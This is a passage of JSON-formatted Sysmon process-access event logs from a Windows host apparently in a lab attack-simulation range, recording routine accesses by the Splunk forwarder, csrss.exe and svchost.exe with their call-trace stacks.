C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17249|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+137ff|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","SourceProcessId":"4864","SourceThreadId":"4872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-001043670500}","TargetProcessId":"1408","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17249|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+137ff|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-001043670500}\r\nTargetProcessId: 1408\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-001043670500}","TargetProcessId":"1408","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 